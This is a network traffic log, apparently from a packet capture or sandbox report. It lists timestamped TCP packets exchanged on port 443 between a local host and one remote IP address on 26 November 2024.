                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:12.635461092 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:12.810561895 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:12.855361938 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:13.338875055 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:13.339031935 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:13.339051008 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:13.339080095 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:13.339179039 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:13.339179039 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:13.339214087 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:13.339279890 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:13.506714106 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:13.506788969 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:13.506887913 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:13.506922960 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:13.506939888 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:13.507019997 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:13.583261967 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:13.583323002 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:13.583339930 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:13.583369970 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:13.583389997 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:13.583432913 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:13.637073040 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:13.637115002 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:13.637239933 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:13.637271881 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:13.637317896 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:13.690826893 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:13.690865040 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:13.690979958 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:13.691020012 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:13.691066980 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:13.725138903 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:13.725173950 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:13.725281000 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:13.725320101 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:13.725369930 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:13.787424088 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:13.787461996 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:13.787611008 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:13.787647963 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:13.787713051 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:13.811039925 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:13.811078072 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:13.811181068 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:13.811198950 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:13.811261892 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:13.834451914 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:13.834480047 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:13.834564924 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:13.834577084 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:13.834628105 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:13.853655100 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:13.853688002 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:13.853789091 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:13.853801012 CET44349708198.252.105.91192.168.2.10
Nov 26, 2024 08:12:13.853846073 CET    49708    443      192.168.2.10      198.252.105.91
Nov 26, 2024 08:12:13.867225885 CET    443      49708    198.252.105.91    192.168.2.10
Nov 26, 2024 08:12:13.867301941 CET    443      49708    198.252.105.91    192.168.2.10
Nov 26, 2024 08:12:13.867398024 CET    49708    443      192.168.2.10      198.252.105.91
Nov 26, 2024 08:12:13.867428064 CET    443      49708    198.252.105.91    192.168.2.10
Nov 26, 2024 08:12:13.867463112 CET    49708    443      192.168.2.10      198.252.105.91
Nov 26, 2024 08:12:13.867511034 CET    49708    443      192.168.2.10      198.252.105.91
Nov 26, 2024 08:12:13.981040001 CET    443      49708    198.252.105.91    192.168.2.10
Nov 26, 2024 08:12:13.981129885 CET    443      49708    198.252.105.91    192.168.2.10
Nov 26, 2024 08:12:13.981169939 CET    49708    443      192.168.2.10      198.252.105.91
Nov 26, 2024 08:12:13.981205940 CET    443      49708    198.252.105.91    192.168.2.10
Nov 26, 2024 08:12:13.981225014 CET    49708    443      192.168.2.10      198.252.105.91
Nov 26, 2024 08:12:13.981254101 CET    49708    443      192.168.2.10      198.252.105.91
Nov 26, 2024 08:12:13.990597010 CET    443      49708    198.252.105.91    192.168.2.10
Nov 26, 2024 08:12:13.990648031 CET    443      49708    198.252.105.91    192.168.2.10
Nov 26, 2024 08:12:13.990675926 CET    49708    443      192.168.2.10      198.252.105.91
Nov 26, 2024 08:12:13.990684032 CET    443      49708    198.252.105.91    192.168.2.10
Nov 26, 2024 08:12:13.990726948 CET    49708    443      192.168.2.10      198.252.105.91
Nov 26, 2024 08:12:14.000979900 CET    443      49708    198.252.105.91    192.168.2.10
Nov 26, 2024 08:12:14.001023054 CET    443      49708    198.252.105.91    192.168.2.10
Nov 26, 2024 08:12:14.001061916 CET    49708    443      192.168.2.10      198.252.105.91
Nov 26, 2024 08:12:14.001071930 CET    443      49708    198.252.105.91    192.168.2.10
Nov 26, 2024 08:12:14.001096964 CET    49708    443      192.168.2.10      198.252.105.91
Nov 26, 2024 08:12:14.001131058 CET    49708    443      192.168.2.10      198.252.105.91
Nov 26, 2024 08:12:14.011152983 CET    443      49708    198.252.105.91    192.168.2.10
Nov 26, 2024 08:12:14.011205912 CET    443      49708    198.252.105.91    192.168.2.10
Nov 26, 2024 08:12:14.011236906 CET    49708    443      192.168.2.10      198.252.105.91
Nov 26, 2024 08:12:14.011245012 CET    443      49708    198.252.105.91    192.168.2.10
Nov 26, 2024 08:12:14.011286974 CET    49708    443      192.168.2.10      198.252.105.91
Nov 26, 2024 08:12:14.019458055 CET    443      49708    198.252.105.91    192.168.2.10
Nov 26, 2024 08:12:14.019478083 CET    443      49708    198.252.105.91    192.168.2.10
Nov 26, 2024 08:12:14.019545078 CET    49708    443      192.168.2.10      198.252.105.91
Nov 26, 2024 08:12:14.019553900 CET    443      49708    198.252.105.91    192.168.2.10
Nov 26, 2024 08:12:14.019598007 CET    49708    443      192.168.2.10      198.252.105.91
Nov 26, 2024 08:12:14.020770073 CET    443      49708    198.252.105.91    192.168.2.10
Nov 26, 2024 08:12:14.030051947 CET    443      49708    198.252.105.91    192.168.2.10
Nov 26, 2024 08:12:14.030078888 CET    443      49708    198.252.105.91    192.168.2.10
Nov 26, 2024 08:12:14.030143023 CET    49708    443      192.168.2.10      198.252.105.91
Nov 26, 2024 08:12:14.030153990 CET    443      49708    198.252.105.91    192.168.2.10
Nov 26, 2024 08:12:14.040064096 CET    443      49708    198.252.105.91    192.168.2.10
Nov 26, 2024 08:12:14.040107965 CET    443      49708    198.252.105.91    192.168.2.10
Nov 26, 2024 08:12:14.040185928 CET    49708    443      192.168.2.10      198.252.105.91
Nov 26, 2024 08:12:14.040201902 CET    443      49708    198.252.105.91    192.168.2.10
Nov 26, 2024 08:12:14.040241957 CET    49708    443      192.168.2.10      198.252.105.91
Nov 26, 2024 08:12:14.048667908 CET    443      49708    198.252.105.91    192.168.2.10
Nov 26, 2024 08:12:14.048686981 CET    443      49708    198.252.105.91    192.168.2.10
Nov 26, 2024 08:12:14.048777103 CET    49708    443      192.168.2.10      198.252.105.91
Nov 26, 2024 08:12:14.048789024 CET    443      49708    198.252.105.91    192.168.2.10
Nov 26, 2024 08:12:14.096499920 CET    49708    443      192.168.2.10      198.252.105.91
Nov 26, 2024 08:12:14.185776949 CET    443      49708    198.252.105.91    192.168.2.10
Nov 26, 2024 08:12:14.185870886 CET    443      49708    198.252.105.91    192.168.2.10
Nov 26, 2024 08:12:14.185874939 CET    49708    443      192.168.2.10      198.252.105.91
Nov 26, 2024 08:12:14.185916901 CET    443      49708    198.252.105.91    192.168.2.10
Nov 26, 2024 08:12:14.185933113 CET    49708    443      192.168.2.10      198.252.105.91
Nov 26, 2024 08:12:14.186290026 CET    49708    443      192.168.2.10      198.252.105.91
Nov 26, 2024 08:12:14.192689896 CET    443      49708    198.252.105.91    192.168.2.10
Nov 26, 2024 08:12:14.192764044 CET    443      49708    198.252.105.91    192.168.2.10
Nov 26, 2024 08:12:14.192784071 CET    49708    443      192.168.2.10      198.252.105.91
Nov 26, 2024 08:12:14.192811966 CET    443      49708    198.252.105.91    192.168.2.10
Nov 26, 2024 08:12:14.192833900 CET    49708    443      192.168.2.10      198.252.105.91
Nov 26, 2024 08:12:14.192851067 CET    49708    443      192.168.2.10      198.252.105.91
Nov 26, 2024 08:12:14.200907946 CET    443      49708    198.252.105.91    192.168.2.10
Nov 26, 2024 08:12:14.200963020 CET    443      49708    198.252.105.91    192.168.2.10
Nov 26, 2024 08:12:14.201008081 CET    49708    443      192.168.2.10      198.252.105.91
Nov 26, 2024 08:12:14.201050997 CET    443      49708    198.252.105.91    192.168.2.10
Nov 26, 2024 08:12:14.201080084 CET    49708    443      192.168.2.10      198.252.105.91
Nov 26, 2024 08:12:14.201102972 CET    49708    443      192.168.2.10      198.252.105.91
Nov 26, 2024 08:12:14.209474087 CET    443      49708    198.252.105.91    192.168.2.10
Nov 26, 2024 08:12:14.209522009 CET    443      49708    198.252.105.91    192.168.2.10
Nov 26, 2024 08:12:14.209569931 CET    49708    443      192.168.2.10      198.252.105.91
Nov 26, 2024 08:12:14.209584951 CET    443      49708    198.252.105.91    192.168.2.10
Nov 26, 2024 08:12:14.209614038 CET    49708    443      192.168.2.10      198.252.105.91
Nov 26, 2024 08:12:14.209635019 CET    49708    443      192.168.2.10      198.252.105.91
Nov 26, 2024 08:12:14.216192961 CET    443      49708    198.252.105.91    192.168.2.10
Nov 26, 2024 08:12:14.216212034 CET    443      49708    198.252.105.91    192.168.2.10
Nov 26, 2024 08:12:14.216280937 CET    49708    443      192.168.2.10      198.252.105.91
Nov 26, 2024 08:12:14.216288090 CET    443      49708    198.252.105.91    192.168.2.10
Nov 26, 2024 08:12:14.216330051 CET    49708    443      192.168.2.10      198.252.105.91
Nov 26, 2024 08:12:14.224973917 CET    443      49708    198.252.105.91    192.168.2.10
Nov 26, 2024 08:12:14.224991083 CET    443      49708    198.252.105.91    192.168.2.10
Nov 26, 2024 08:12:14.225058079 CET    49708    443      192.168.2.10      198.252.105.91
Nov 26, 2024 08:12:14.225064039 CET    443      49708    198.252.105.91    192.168.2.10
Nov 26, 2024 08:12:14.225099087 CET    49708    443      192.168.2.10      198.252.105.91
Nov 26, 2024 08:12:14.232300997 CET    443      49708    198.252.105.91    192.168.2.10
Nov 26, 2024 08:12:14.232319117 CET    443      49708    198.252.105.91    192.168.2.10
Nov 26, 2024 08:12:14.232400894 CET    49708    443      192.168.2.10      198.252.105.91
Nov 26, 2024 08:12:14.232407093 CET    443      49708    198.252.105.91    192.168.2.10
Nov 26, 2024 08:12:14.232450962 CET    49708    443      192.168.2.10      198.252.105.91
Nov 26, 2024 08:12:14.240586042 CET    443      49708    198.252.105.91    192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.240693092 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.240711927 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.240721941 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.240755081 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.240777969 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.388593912 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.388674974 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.388763905 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.388792992 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.388808966 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.388839960 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.395874977 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.395941973 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.396049023 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.396075964 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.396095037 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.396116972 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.403922081 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.403954029 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.404047966 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.404071093 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.404114008 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.412358999 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.412398100 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.412538052 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.412569046 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.412718058 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.419806957 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.419837952 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.420033932 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.420061111 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.420118093 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.428200006 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.428229094 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.428354979 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.428364038 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.428428888 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.435246944 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.435277939 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.435381889 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.435393095 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.435482025 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.443495989 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.443526030 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.443625927 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.443645954 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.443701982 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.589782953 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.589812040 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.589952946 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.589986086 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.590039015 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.598012924 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.598042011 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.598162889 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.598171949 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.598221064 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.605195999 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.605222940 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.605340004 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.605349064 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.605402946 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.613629103 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.613686085 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.613805056 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.613816023 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.613867998 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.621423960 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:14.621448994 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:15.025655985 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:15.033766985 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:15.033804893 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:15.033868074 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:15.033876896 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:15.033910990 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:15.033931971 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:15.040903091 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:15.040931940 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:15.041042089 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:15.041053057 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:15.041100025 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:15.049160004 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:15.049190998 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:15.049302101 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:15.049310923 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:15.049359083 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:15.195652008 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:15.195681095 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:15.195782900 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:15.195805073 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:15.195858002 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:15.203809023 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:15.203830004 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:15.203919888 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:15.203952074 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:15.204022884 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:15.210920095 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:15.210937977 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:15.211023092 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:15.211056948 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:15.211100101 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:15.219201088 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:15.219218016 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:15.219310999 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:15.219346046 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:15.219397068 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:15.226829052 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:15.226847887 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:15.226928949 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:15.226954937 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:15.227010012 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:15.235105038 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:15.235124111 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:15.235228062 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:15.235251904 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:15.235301018 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:15.243171930 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:15.243202925 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:15.243268967 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:15.243302107 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:15.243329048 CET49708443192.168.2.10198.252.105.91
